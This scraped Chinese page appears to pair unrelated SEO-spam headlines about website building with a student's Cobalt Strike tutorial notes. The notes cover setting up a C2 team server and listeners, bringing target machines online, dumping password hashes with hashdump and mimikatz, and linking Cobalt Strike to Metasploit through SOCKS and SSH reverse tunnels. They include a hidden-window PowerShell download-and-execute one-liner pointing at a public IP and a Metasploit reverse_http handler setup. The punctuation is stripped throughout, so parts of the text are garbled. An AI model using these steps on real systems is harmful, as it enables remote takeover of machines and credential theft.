当前位置: 首页 > news >正文

做网站怎么调用栏目网站备案的核验单

做网站怎么调用栏目,网站备案的核验单,营销网站和展示型网站,做网站包括什么软件一、快捷工具栏 3、需要创建监听器#xff0c;才能让靶机上线#xff0c;连接我们公网服务端上去开启的帧监听端口#xff0c;做任何操作 都是通过服务器的IP地址去连接靶机#xff0c;去和靶机进行文件stage的一个传输和交互。这里推荐把cs 放到公网上边#xff0c;比较…一、快捷工具栏 3、需要创建监听器才能让靶机上线连接我们公网服务端上去开启的帧监听端口做任何操作 都是通过服务器的IP地址去连接靶机去和靶机进行文件stage的一个传输和交互。这里推荐把cs 放到公网上边比较方便让靶机上线。 4-6单个视图 11、payload分为stage和stageless(相当于php大马拥有所有的功能包括meterpreter,很大不 需其他的管理器就能实现完全的交互网络环境比较差的时候可以使用它大并且容易查杀) 12、已淘汰 13、生成恶意Office宏攻击嵌入恶意宏攻击。 14、建立web_delivery是在内存上执行恶意代码不会再服务器上留下文件的。 查看进程ps aux | grep teamserver kali -9 进程  干掉进程 sudo yum install java-11-openjdk-devel(cs4.3版本java11环境) sudo yum list installed | grep java查看已安装java sudo alternatives --config java 切换环境 java -version查看版本 export JAVA_HOME$(dirname $(dirname $(readlink -f $(which java)))) echo $JAVA_HOME     设置环境变量此两条命令直接在命令行执行 sudo lsof -i :50050     查看端口状态 ./msg  用户名  信息发送给指定用户 二、创建监听器listener 点击Cobalt strike——监听器——add 获取靶机上线stager任何靶机上线都是通过服务端 查看端口是否在线  netstat -ano |grep 8080 三、学习cobaltrike实战演示1 创建完监听器后想让靶机上线那就攻击靶机 云服务器用作实验的话如果安全组不需要特定要求直接放通全部 靶机上线操作 选择前边设置的监听器和方法这里的方法我是用的是powershell 选择文件保存位置这里我保存到桌面为了方便这个是windows10做的客户端 之后需要再开启一个端口让靶机可以下载这个文件使用web-drive-by的host file选择刚刚生 成的文件 复制下边内容 http://39.99.136.38:9090/download/file.ext 在靶机里边执行  这使用的是windows7 64位操作系统 此时靶机已上线 上线之后可以靶机进行一系列的控制 这里是默认60秒的心跳间隔真实环境可以不修改容易被ids查杀 ①设置时间间隔 ②在beacon中  sleep  2亦可以设置 靶机想要下线就把进程process关掉在这个界面退出会再次上线 shell ipconfig 命令 help 可以查看我们能执行的一些命令 重要模块 ②转移③内存中获取密码④不建议开启vps带宽较小很卡 screenshot截屏 在视图界面可以查看 亦可以端口扫描和查看进程 四、学习cobaltrike实战演示2 其他的监听器和attack进行一个主机上线如下 设置端口监听器同样如上执行可以上线 删除我们开启的东西 ①mamager   web server ②attacks ——web-driver-by ——manager 这如果在设置的时候没有copy,这里也是可以copy的 想关掉直接选中点击kill 端口扫描完可做如下操作三个视图模式 脚本可以github搜选择一个路径导入cna成功会显示ready√ 五、学习cobaltrike攻击流程 拿root和system权限 选择监听器和利用脚本 自动打出去 两个用户是不一样的 ①hashdump命令或者②右击——执行——hash读取用户哈希值或者③右键run mimikatzs 此时在任务管理器运行着powwershell.exe把它杀死了就没了可以利用msf做进程迁移 先右击exit和remove把靶机移除掉新操作因为直接remove会在自动上线 比较安全 powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(http://35.12.32.156:9091/a))复制此代码到靶机去执行 此处是dvwa靶场 此时靶机又上线了 靶机上线方法 ①命令执行②文件上传上传webshell(工具执行连接)无报错有权限执行靶机即可上线如果 cs是在内网中的确定靶机能够连到cs 六、学习cs和msf联动 1、cs联动msf之socks代理访问内网或者无法直接访问的服务器就需要建立代理 2、cs联动msf之外部监听器 3、练习 1、介绍 cobalt strike(简称CS)及Metasploit(简称msf)各有所长cs更适合作为稳控平台msf更适用于与各 类内网信息搜集及漏洞利用。为了取各家之所长我们进行联动。 meterpreter的功能十分强大模块非常多攻击辅助编码等等cs进行团队合作进行主机 的上线和smb的横向移动内网管控平台 环境搭建条件 ①cs客户端一台windows10操作系统一台centos7操作系统或者kali操作系统也行 ②一台云服务器作为cs服务器公网上vps ③一台windows7(可联网)一台windows2012不联网 操作步骤 ①socks  端口如 socks  1234 可以在vps查看netstat -ano|grep 1234是否是监听状态 如何连接代理代理是对服务端的客户端只是连接服务器所有的操作都是在服务端即vps操作 的 复制上述命令转到msf中执行 此时整个msf就被代理到了1234端口此时进行辅助端口扫描 非常慢 kali中操作 在文件中写入如下内容保存 此时还ping不了ping在tcp/ip上一层icmp不能对ping代理转发namp可以进行no ping 扫 描 此时会很慢因为走代理 虚拟机——物理网卡——运营商交换机——路由——vps服务器此时就可扫描重要端口不全 扫 结果如下 2、学习cs联动msf之外部监听器 ①创建一个新的linstener 转移时会开 把system的sesion发给metetpreter kali中 将cs服务器的session发送到cs客户端也就是meterpreter(kali这一端) 外网ping不通内网即cs服务器无法通cs客户端做代理转发 保存退出 重启生效有隧道转发功能 执行此命令就可代理转发 此时内网的8085端口和vps的8085端口就通了去看拓扑图 选择上线的主机——右键span转移——选择监听器——外部的http8085  拿到meterpreter 3、实操操作步骤 这里是提权一下后的ssystem权限的用户 ①在vps中    vi  /etc/ssh/sshd_configsshd_config是服务端配置文件 ②AllowTcpForwarding yes GatewayPorts yes TCPKeepAlive yes PasswordAuthentication   yes ③systemctl restart sshd.service或者systemctl restart sshd(这样才有隧道转发的功能) ④回到本地的 kali 中通过 ssh 隧道做转发 创建ssh隧道常用的参数: -C:压缩传输提供传输速度 -f :将ssh传输转入后台执行不占用当前的shell -N:建立静默连接(建立了连接但是看不到具体会话) -g:允许远程主机连接本地用于转发的端口 -L:本地端口转发 -R:远程端口转发 -D:动态转发 -P指定ssh端口 ⑤命令执行ssh -C-f-N -g -R 0.0.0.0:8085:192.168.129.139:8085 root119.xx.xx.xx -p 22 含义解释通过 119.xx.xx.xx 机器把外部的 8085 端口上的流量转到本地192.168.129.139 的 8085 端口上而本地的 8085 端口上跑的又的监听器所以最终才造成 meterpreter本地上线的效 果。 ⑥netstat -anltup 查看正在工作的端口 ⑦netstat -tulnp |grep 8085查看服务器是否开启8085端口 此处有错误可以查杀pid  kill  pid即可ssh ⑧创建一个新的监听器 ⑨在kali中启用msfconsole设置参数 use exploit/multi/handler set payload windows/meterpreter/reverse_http set lhost  192.168.129.139 set lport 9999 show options run ⑩ssh -C-f-N -g -R 0.0.0.0:8085:192.168.129.139:8085 root119.xx.xx.xx -p 22 最好检查一下是否设置成功netstat -anltup没有问题做如下操作 等待stage发送 此时拿到了meterpreter这个不知道是抽了什么风重启虚拟机之后我搞了两次才出来多次 尝试比较卡此时可以拿shell如果显示乱码  chcp 65001,进程迁移,exit退出 一、快捷工具栏 二、创建监听器listener 三、学习cobaltrike实战演示1 四、学习cobaltrike实战演示2 五、学习cobaltrike攻击流程 六、学习cs和msf联动 1、介绍 2、学习cs联动msf之外部监听器 3、实操操作步骤
http://www.tj-hxxt.cn/news/229509.html

相关文章:

  • 免费看网站源码网站建设技术大赛试题
  • 网站实名认证在哪27WordPress主题
  • 网站建设实验报告手写商城开发哪家好
  • 个人网站做论坛还是博客好微信开发者平台取消授权
  • 网页设计参考网站互联网广告推广好做吗
  • 百度建站云南服务中心如何导出WordPress主题
  • 网站建设中企动力强个人网站怎样申请icp
  • 可信网站图片logo安装专业制作网站公司
  • 网站后台管理系统php铲车找事做找哪些网站
  • 注册了域名之后怎么做网站机械类网站如何做网站优化
  • 域名及密码登录域名管理网站桦南县建设局网站
  • 网站方案设计WordPress写小说插件
  • 网站上面的水印怎么做建设造价信息网站
  • 网站网页制作电话商业网页设计
  • 网站栏目做树形结构图国外优质设计网站
  • 旅游电子商务网站的建设方式做国外网站有哪些
  • 网站怎么更改域名解析温州网站关键字优化
  • 企网站建设卖模板的网站
  • 网站电脑基础培训班中铁建设投资集团有限公司招聘网站
  • 贵阳网站设计阳光创信好吗lamp wordpress 404
  • 手工艺品网站建设wordpress 文章版权
  • 网站建设虍金手指花总企业网站建设方案书模板
  • 东莞网站建设网广宁县住房建设局网站
  • 柯林自助建站wordpress名片主题
  • 网站百度搜索情况和反链接优化建议视频素材网站怎么建
  • 公司搭建网站吉林建设公司网站
  • 网站怎么做排名嘉鱼网站建设哪家专业
  • 规划和布局营销型网站的四大重点北京网站建设新鸿微信号
  • 建一个电商网站多少钱湖南建筑一体化平台
  • 南京市建设局网站栖霞免费下载app软件下载安装到手机